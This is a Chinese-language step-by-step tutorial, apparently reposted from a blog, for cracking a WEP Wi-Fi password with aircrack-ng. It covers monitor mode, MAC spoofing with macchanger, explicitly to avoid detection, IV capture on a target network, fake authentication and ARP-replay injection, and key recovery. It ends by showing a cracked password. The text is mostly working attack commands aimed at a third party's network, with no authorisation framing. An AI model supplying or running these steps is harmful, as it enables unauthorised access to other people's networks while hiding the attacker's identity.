0x1:工具:

      1.基于linux

      2.网卡支持注入

      3.有X terminal

      4.已经安装aircrack-ng

0x2:破解目标

image

0x3:

ifconfig wlan0 down

iwconfig wlan0 mode monitor

clip_image001
0x4:macchanger --mac 00:11:22:33:44:55 wlan0

     ifconfig wlan0 up

用macchanger工具改Mac地址,防止被别人发现和方便输入 一举两得。(N900默认没有macchanger工具 要自己下载安装 你可以再源里下载或者手动下载)

image

0x5: airodump-ng wlan0 抓包

clip_image001[4]

运行airodump-ng wlan0后:

image

找到破解目标的Mac地址和频道。

BSSID是Mac

-c是频道

0x6:airodump-ng --ivs -c 破解目标的频道 -w 保存的名字 --bssid 破解目标的Mac wlan0

(--ivs 只保存可用于破解的ivs数据报文,这样可以有效的缩减保存数据包大小)

image

运行airodump-ng --ivs -c 破解目标的频道 -w 保存的名字 --bssid 破解目标的Mac wlan0 :

clip_image001[6]

0x7:aireplay-ng -1 0 -a 目标的Mac -h 00:11:22:33:44:55(自己的Mac) wlan0。 注入

clip_image001[8]

运行aireplay-ng -1 0 -a 目标的Mac -h 00:11:22:33:44:55(自己的Mac) wlan0:

image

0x8:aireplay-ng -3 -b 目标Mac -h 00:11:22:33:44:55(自己的Mac) wlan0。对目标使用arprequet注入攻击

clip_image001[10]
运行aireplay-ng -3 -b 目标Mac -h 00:11:22:33:44:55(自己的Mac) wlan0:

image

这个时候ivs无线数据报文的值就开始狂飙,这个取决于无线网络的环境了 越多人使用这个无线网络进行大流量的交互ivs的值就飚的越快。当data到达2万以上时 就可以开始破解了,要成功破解高强度复杂的WEP密码 大概在8万以上的ivs。

clip_image001[12]
我捕获到data是3万左右

image

0x9:开始破解密码:aircrack-ng -P 2 名字-01.ivs

clip_image001
密码是:db@#1

密码在:KEY FOUND! (ASCII:这里就是密码)

http://hi.baidu.com/t_soiar/blog/item/a0ad65191ff5b271f919b890.html

源链接

Hacking more

...